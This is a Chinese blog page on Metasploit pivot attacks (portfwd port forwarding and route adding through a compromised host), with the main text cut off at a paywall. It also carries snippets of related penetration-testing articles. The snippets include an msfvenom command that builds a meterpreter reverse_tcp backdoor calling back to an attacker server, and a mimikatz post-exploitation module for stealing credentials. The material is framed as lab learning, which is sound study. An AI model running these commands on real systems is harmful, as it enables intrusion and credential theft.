Metasploit 跳板攻击

原创 于 2025-03-21 21:07:51 发布 · 559 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #linux #metasploit

         今天有一个机会测试MSF的跳板攻击,涉及到端口转发和添加路由,下面详细介绍一下。2个可以单独使用,也可以结合使用。以下是测试拓扑。

 

        前提是攻击机192.168.136.155通过某种方式控制了S1,192.168.100.100,然后可以通过端口转发方式连接该主机的其他端口,也可以通过添加路由的方式把该主机当成跳板攻击其他主机。

一、端口转发

portfwd 原理

portfwd 是借用 meterpreter shell 建立的连接进行数据传输,达到端口转发的目的。

当建立反向连接时,可以绕过防火墙的检测。

命令:

meterpreter > portfwd --help
Usage: portfwd [-h] [add | delete | list | flush] [args]

选项说明
  • -L <opt>:指定本地主机监听的地址(可选)。在反向连接中,表示本地主机要连接的地址。
  • -
最低0.47元/天 解锁文章
Msf跳板: SSH 版本 route
weiliang369的博客
03-23 1433
其实就是利用SSH的端口转发做代理功能 root@Kali:/tmp# git clone https://github.com/mubix/metassh.git Cloning into metassh... root@Kali:/tmp# cp -rf metassh/* /pen/msf3/plugins/ 启动MSF 载入插件 msf > load meta_ssh [+] Added 2 Exploit modules for metaSSH [+] Added 1 Pa.
内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板
qq_60115503的博客
04-20 3714
靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows server 2008是域控 解压后双击文件夹中的,vmx文件即可一键创建虚拟机,登录密码都是hongrisec@2019,2003和2009输入密码后会强制要求改密码 网络配置 win7网络适配器为自定义(VMnet1仅主机模式),再添加一个网络适配器设置为NAT模式; windows200.
内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射
f_carey的博客
09-03 3717
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 中的端口转发与端口映射Metasploit portfwd 原理2 实验环境2.1 建立 meterpreter 反向连接2.2 portfwd 端口转发2.3 portfwd 端口映射 Metasploit portfwd 原理 portfwd 是借用 meterpreter s.
外网主机通过msf和内网跳板机访问内网不出网的主机
m0_62284238的博客
09-01 601
获得内网的一台可出网主机的权限后,外网主机通过msf,以该主机为代理访问内网另一台不出网的主机
内网渗透——Metasploit的代理转发
m0_65544268的博客
07-10 1201
计算机配置==》管理模块==》网络==》Lanman工作站==》启用不安全的来宾登录。7)使用proxychains4测试访问主机2上的IIS。win10/11有可能没有打开服务,导致无法访问共享。lhost: 0.0.0.0 指定主机2本机地址。3)被攻击主机1运行生成的1111.exe文件。这样我们就实现了第一个主机上线的过程了。2)在已经上线的主机1上创建代理转发功能。出现这样的页面就说明添加路由成功了。这样我们就实现了三台主机上线了。10)主机2运行2222.exe。
内网渗透(一)反向代理实现外网访问到内网
m0_63699746的博客
08-02 1856
msfvenom -p windows/meterpreter/reverser_tcp LHOST=你的云服务器ip LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。总结:首先攻击端(服务器攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板攻击机,来实现访问另一台内网上的虚拟机。攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。
内网安全:Socks 代理 -- 本地代理 技术.
Innocence_0的博客
06-29 1137
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
内网安全之:Metasploit 跳板攻击: 添加路由方式
f_carey的博客
09-04 1082
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 跳板攻击: 添加路由方式1 Metasploit 跳板攻击: 添加路由方式原理2 实验环境2.1 建立 meterpreter 反向连接2.2 查看当前系统信息2.3 利用增加的路由扫描新网段的主机3 meterpreter 基础命令 1 Metasploit 跳板攻击: 添加路由方式.
Metasploit攻击linux实例
jjxsir的博客
12-28 3769
一、实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二、实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali linux, IP地址:10.1.1.141 三、实验内容与实验要求 初步了解实验环境及漏洞信息搜集 利用UnrealIRCd后门漏洞攻击漏洞主机 利用Distcc后门漏洞攻击Metasploitable2漏洞主机 Distcc后门漏洞 四、实验过程与分析 查看Metasploitable2漏洞主机的登录用户
kali使用Metasploit进行渗透攻击
lhf13036943631的博客
05-06 1161
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
meterpreter模块之后渗透攻击实战总结.docx
07-10
meterpreter模块之后渗透攻击实战总结,自己渗透的总结,希望对你的渗透水平提高有帮助,meterpreter模块是各种漏洞的攻击渗透模块
渗透测试工具MSF
2303_77223717的博客
07-08 1799
Metasploit Framework 简称MSF,是一款开源的安全漏洞检测工具。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台,集成数千个漏洞利用、辅助测试模块。
渗透测试之三内网跳板
习惯积淀的博客
05-23 5033
搭建内网的转发跳板 当成功控制一个网络中的一台主机后,由于后面的主机都在内网中无法访问,所以需要在跳板机上搭建代理,实现对内网中的其他主机的访问 portfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4–IPV6的转换转发。并且内置于meterpreter。 攻击机: 192.168.1.5 Debian 靶机: 192.168.1.4 Windows 7 192.168.1...
内网渗透隧道技术的相关知识
qq_44029310的博客
07-16 1400
以前的暗月课程自学笔记整理。
端口转发_基于 Portfwd 端口转发
weixin_33456137的博客
12-12 414
文章作者:Micropoor原文链接:https://micropoor.blogspot.comportfwd是一款强大的端口转发工具,支持TCP,UDP,支持IPV4--IPV6的转换转发。并且内置于meterpreter。其中exe单版本源码如下:https://github.com/rssnsj/portfwd攻击机: 192.168.1.5 Debian靶机...
Metasploit Portfwd 端口转发
m0_50526465的博客
05-23 935
Metasploit Portfwd 端口转发 Portfwd简介(端口转发/重定向) Meterpreter shell中的portfwd命令最常用作透视技术,允许直接访问攻击系统无法访问的机器。在可以访问攻击者和目标网络(或系统)的受损主机上运行此命令,我们可以实质上通过本机转发TCP连接,从而使其成为一个支点。就像使用ssh连接的端口转发技术一样,portfwd将中继与连接的机器之间的TCP连接。 操作指令 portfwd -h //查看帮助 Usage: port...
利用msf进行后渗透中常见的知识点
热门推荐
Shanfenglan's blog
10-28 10万+
内网代理 首先需要一个session 搭建路由 然后配置路由,比如我们配置让这个session来转发我们访问的172.16.250.0/24这个网段的所有流量。这时候我们需要在meterpreter里面执行 run autoroute -s 172.16.250.0/24 执行完后,可以将这个shell放到后台(利用bg命令)然后使用route print来查看配置是否成功,成功的范例如下: 配置socks5 这时候我们已经搭好了路由,但是还不能使用,这时候还需要创建一个socks5,然后通过pr
使用msf入侵多层级网络架构
06-01 2万+
假设,有一个多层网络环境,每层靶机只与相邻服务器互通,那么,如何从Hack的笔记本层层突破,获取到第4层靶机Server5的系统权限呢?首先,我们通过Web入侵获得Server1权限,并...
Metasploit portfwd跳板渗透
红领巾 的专栏
07-11 5079
前几天翻看Metasploit’s Meterpreter文档中关于portfwd介绍 Usage:portfwd [ -arv ] [ -L laddr ] [ -l lport ][ -h rhost ] [ -p rport ] [ -P ],看懂了不会用。再者就是在《metasploit渗透测试指南》p89页上参考到了部分。google到了篇老外关于meterpreter的portfwd端
Metasploit 后渗透攻击技术
最新发布
12-30
### Metasploit 框架后渗透攻击技术方法 #### 后渗透攻击概述 后渗透攻击是指成功利用漏洞并获得目标系统的初步访问权限后所采取的一系列行动。这些活动旨在进一步探索内部网络、提升权限、持久化控制以及数据收集等。 #### 提升权限 为了扩大对受控机器上的影响力,通常会尝试提权操作。这可以通过寻找本地服务中的弱点或未修补的安全问题来实现。Metasploit提供了多种模块帮助执行此任务,例如`getsystem`命令可以试图将低级别shell转换成具有更高特权的进程[^1]。 #### 数据采集与凭证窃取 一旦获得了足够的权限,就可以开始搜集敏感信息。这可能涉及浏览文件系统查找配置文件或其他潜在有价值的数据;也可以通过特定工具如Mimikatz从内存中提取明文密码和其他认证材料。在Metasploit中,有专门设计用于此类目的的辅助模块和脚本[^2]。 ```bash use post/windows/gather/credentials/mimikatz set SESSION 1 run ``` 这段代码展示了如何加载mimikatz模块,并设置要运行它的会话ID(这里假设为1),最后启动它以获取存储于Windows操作系统内的各种形式的身份验证令牌。 #### 内网横向移动 当掌握了某些节点上更高级别的访问权之后,下一步往往是向其他设备蔓延开来。借助已知的有效账户凭据或是新发现的服务缺陷作为跳板,能够悄无声息地渗入更多位置。对于Linux环境下的SSH密钥传播就是一个典型例子;而在Windows域环境中,则可能会运用到Pass-the-Hash (PtH) 或 Pass-The-Ticket (PTT) 技巧[^3]。 #### 建立持久性机制 为了让入侵行为不易被察觉并且能够在重启后继续保持存在感,在受害主机里安装隐蔽型恶意软件成为必要选项之一。这类程序往往伪装成合法应用程序的一部分,定期激活并与远程服务器通信维持长期联系通道。Post exploitation阶段也包含了创建计划任务、修改注册表项等多种手段达成相同效果。 #### 清理痕迹 完成既定目标之前,务必清除所有可能导致暴露身份的日志记录及其他证据。这不仅限于删除临时文件夹里的残留物,还包括干扰审计日志的功能,甚至重置防火墙规则阻止后续调查工作顺利开展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

骆驼1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值